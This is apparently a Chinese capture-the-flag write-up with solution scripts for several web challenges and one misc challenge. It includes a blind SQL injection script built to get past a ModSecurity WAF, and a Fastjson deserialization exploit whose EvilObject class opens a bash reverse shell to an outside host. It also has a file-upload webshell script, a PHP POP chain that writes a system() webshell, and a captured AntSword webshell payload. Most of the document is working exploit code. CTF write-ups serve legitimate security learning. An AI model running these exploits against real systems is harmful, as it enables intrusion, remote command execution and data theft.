# 高校y
[toc]
# web
## ezcms
等官方修复了再放
## ezbypass
使用Nday 绕disable_functions
https://www.exploit-db.com/exploits/47462
## ezwaf
Mod security 可参考这个https://hostadvice.com/how-to/how-to-setup-modsecurity-for-apache-on-ubuntu-18-04/ 但是不要增加最后那两行。
通过访问?src= 即可看到源码,从源码可以看到虽然对参数做了mysqli_real_escape_string 但是age 是个整数,只要不存在引号就行了。后来测试了一下,sqlmap 直接就能跑出来了,为了增加点难度我加了个waf,mod_security。需要找到绕waf 的方法。利用这篇文章https://www.anquanke.com/post/id/169738提到的方法可以绕waf。
下面是利用脚本
```python
#!/usr/bin/env python3
import socket
socket.setdefaulttimeout(2)
tmp = """GET /?age=payload HTTP/1.1
Host: 111.186.57.117:43426
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Transfer-Encoding: chunked
a=hhh
"""
flag = ""
sql = "select user()"
sql = "select database()"
sql = "select group_concat(table_name) from information_schema.tables where table_schema=database()" #flag_xdd
sql = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x666c61675f786464" #flag_32122
sql = "select flag_32122 from flag_xdd limit 1"
for i in range(1, 64):
for j in range(256):
try:
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("111.186.57.117",43426))
payload = "1 or if(ascii(substr((%s), %d, 1))=%d, sleep(4), 0)"%(sql, i, j)
# print(payload)
payload = payload.replace(" ", "%20")
tmp1 = tmp.replace("payload", payload)
data = tmp1.replace("\n", "\r\n")
# print(repr(data))
# input()
client.send(data.encode())
response = client.recv(4096)
# print(response)
except Exception as e:
print(e)
flag += chr(j)
print(flag)
```
## ezjava
Fastjson 的反序列化, jdk用的是`jdk1.8.0_181` 不能使用rmi,需要使用ldap。另外还有个坑就是可能需要将hostname修改为外网ip。
服务器端执行:
```
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://202.120.7.206:8080/#EvilObject
```
服务器端执行:
```
python3 -m http.server 8080
```
`EvilObject.java` 然后用`javac EvilObject.java`
```java
public class EvilObject {
public EvilObject(){
try{
String[] cmd = {"/bin/bash", "-c", "bash -i >& /dev/tcp/yourvps.ip/9898 0>&1"};
java.lang.Runtime.getRuntime().exec(cmd);
}catch (Exception e){
e.printStackTrace();
}
}
}
```
payload
```json
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://yourvps.ip:1389/EvilObject","autoCommit":true}}}
```
## ezupload
```python
#!/usr/bin/env python3
import requests
s = requests.Session()
debug = False
def login():
url = 'http://111.186.57.61:10501/login.php'
headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
data = {'username':'xxxx'}
proxies = {'http':'http://127.0.0.1:8080'}
if debug:
r = s.post(url, data=data, headers=headers, proxies=proxies)
else:
r = s.post(url, data=data, headers=headers)
print(r.text)
def upload():
url = 'http://111.186.57.61:10501/upload.php'
headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
data = {'name':'username'}
files = [('avatar', ('x.phtml', open('bqb2.jpg', 'rb'), 'image/png'))]
proxies = {'http':'http://127.0.0.1:8080'}
if debug:
r = s.post(url, data=data, files=files, headers=headers, proxies=proxies)
else:
r = s.post(url, data=data, files=files, headers=headers)
print(r.text)
def excute(cmd):
url = "http://111.186.57.61:10501/uploads/x.phtml"
r = s.get(url, params={"c":"system('%s');"%cmd})
print(r.text)
if __name__ == "__main__":
login()
upload()
excute("/readflag")
```
## ezpop
```python
#!/usr/bin/env python3
import requests
import base64
debug = False
url = 'http://111.186.57.43:10401/'
def upload():
cookie = 'xxx'
headers = {'Cookie':cookie, 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
data = base64.b64decode(b"TzoxOiJBIjo1OntzOjg6IgAqAHN0b3JlIjtPOjE6IkIiOjI6e3M6Nzoib3B0aW9ucyI7YTozOntzOjY6InByZWZpeCI7czo1NDoicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL3VwbG9hZHMvIjtzOjk6InNlcmlhbGl6ZSI7czo5OiJzZXJpYWxpemUiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czoxMDoid3JpdGVUaW1lcyI7aTowO31zOjY6IgAqAGtleSI7czo3OiJ4eHgucGhwIjtzOjk6IgAqAGV4cGlyZSI7aToxMjM7czo4OiJhdXRvc2F2ZSI7YjowO3M6NToiY2FjaGUiO2E6MTp7aTowO3M6MzY6IlBEOXdhSEFnYzNsemRHVnRLQ1JmUjBWVVd6RmRLVHMvUG1abSI7fX0=")
params = {'data':data}
proxies = {'http':'http://127.0.0.1:8080'}
if debug:
r = requests.get(url, params=params, headers=headers, proxies=proxies)
else:
r = requests.get(url, params=params, headers=headers)
print(r.text)
def execute(cmd):
r = requests.get(url+"/uploads/xxx.php", params={"1":cmd})
print(r.text)
if __name__ == "__main__":
upload()
execute("cat /flag*")
```
```php
<?php
// error_reporting(0);
class A{
protected $store;
protected $key;
protected $expire;
public function __construct()
{
$this->autosave = false;
$this->key = "xxx.php";
$this->store = new B();
$this->expire = 123;
$this->cache = ["PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/PmZm"];
}
public function cleanContents(array $contents)
{
$cachedProperties = array_flip([
'path', 'dirname', 'basename', 'extension', 'filename',
'size', 'mimetype', 'visibility', 'timestamp', 'type',
]);
foreach ($contents as $path => $object) {
if (is_array($object)) {
$contents[$path] = array_intersect_key($object, $cachedProperties);
}
}
return $contents;
}
public function getForStorage()
{
$cleaned = $this->cleanContents($this->cache);
return json_encode([$cleaned, $this->complete]);
}
public function save()
{
$contents = $this->getForStorage();
$this->store->set($this->key, $contents, $this->expire);
}
public function __destruct()
{
if (! $this->autosave) {
$this->save();
}
}
}
class B{
public $options;
public function __construct()
{
$this->writeTimes = 0;
$this->options["prefix"] = "php://filter/convert.base64-decode/resource=./uploads/";
$this->options['serialize'] = "serialize";
$this->options['data_compress'] = false;
}
protected function getExpireTime($expire): int
{
return (int) $expire;
}
public function getCacheKey(string $name): string
{
return $this->options['prefix'] . $name;
}
protected function serialize($data): string
{
if (is_numeric($data)) {
return (string) $data;
}
$serialize = $this->options['serialize'];
return $serialize($data);
}
public function set($name, $value, $expire = null): bool
{
$this->writeTimes++;
if (is_null($expire)) {
$expire = $this->options['expire'];
}
$expire = $this->getExpireTime($expire);
$filename = $this->getCacheKey($name);
$dir = dirname($filename);
if (!is_dir($dir)) {
try {
mkdir($dir, 0755, true);
} catch (\Exception $e) {
// 创建失败
}
}
$data = $this->serialize($value);
if ($this->options['data_compress'] && function_exists('gzcompress')) {
//数据压缩
$data = gzcompress($data, 3);
}
$data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
echo $data;
echo $filename;
$result = file_put_contents($filename, $data);
if ($result) {
return true;
}
return false;
}
}
$dir = "uploads/";
if (!is_dir($dir))
{
mkdir($dir);
}
$a = new A();
$s = serialize($a);
echo base64_encode($s);
```
# misc
## Webshell
蚁剑流量分析
```php
@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){@session_start();$key='f5045b05abe6ec9b1e37fafa851f5de9';return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));};;function asoutput(){$output=ob_get_contents();ob_end_clean();echo "8c2b4";echo @asenc($output);echo "e2e10";}ob_start();try{$p=base64_decode($_POST["0x1b4d456c7297d"]);$s=base64_decode($_POST["0xb9b45688a5a08"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";function fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=array();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runcmd($c){$ret=0;if(fe('system')){@system($c,$ret);}elseif(fe('passthru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}elseif(fe('exec')){@exec($c,$o,$ret);print(join("
",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp, 2048));}@pclose($fp);}elseif(fe('antsystem')){@antsystem($c);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
```
从上面可以看到返回值使用了aes加密,可用下面脚本解密
```php
<?php
$key = "f5045b05abe6ec9b1e37fafa851f5de9";
$enc = "kRD1eD+vSZ81FAJ6XClabCR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dZOTFg4DW9MYwG6k3rEvAAR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJHygVK0ad8xG1Qk6pzSaCiR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJ1qI47Cz1/qfnNoNARGhLfVhC0RJlfeKCvbPwpjFn//BSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93FIVjxEmVnLHPVr5M/LQPdxSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93GnMvJfVbvphfWnt17IOkzYjvv91k2fnYDR7u4nlGM3YitxGYGs9mn+HS5iJBXORtYrcRmBrPZp/h0uYiQVzkbWK3EZgaz2af4dLmIkFc5G1itxGYGs9mn+HS5iJBXORtUq4dBjDRFhDqDyzs9CScJhrd3yMusQ+qsnZkq4Ey7NVJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l2hDPuDhVN4TaDLzp9bXyfGeCVhvglAaNo2rA/ovnRTTtfA5ZywMOOijj6md5RItqjXwOWcsDDjoo4+pneUSLao18DlnLAw46KOPqZ3lEi2qNfA5ZywMOOijj6md5RItqgS0b9hS7r5TX9YNZo2awgUAyqVacVgwr1NlNQ2k/kihhh0QQfnjeGdZhkz0N0jAKiMzFmAMa7xQ1URxTaHoHjDg3NaWl/8+PVG+pyaKrbNDjfl77POeQE8+0MCHpz6YxWLJ6mwCe1X3uzz/HSHcHSvQBB8FxjOhugOErOXkd3LZi/60Gr4gIEc1JIxA5A2pE/V6Z/DFwNOR4M/IIIWdGr5";
$msg = openssl_decrypt(base64_decode($enc), 'AES-128-ECB', $key, OPENSSL_RAW_DATA);
echo $msg;
$msg = base64_decode($msg);
echo base64_decode($msg);
```
Sign in with Wallet
Connect another wallet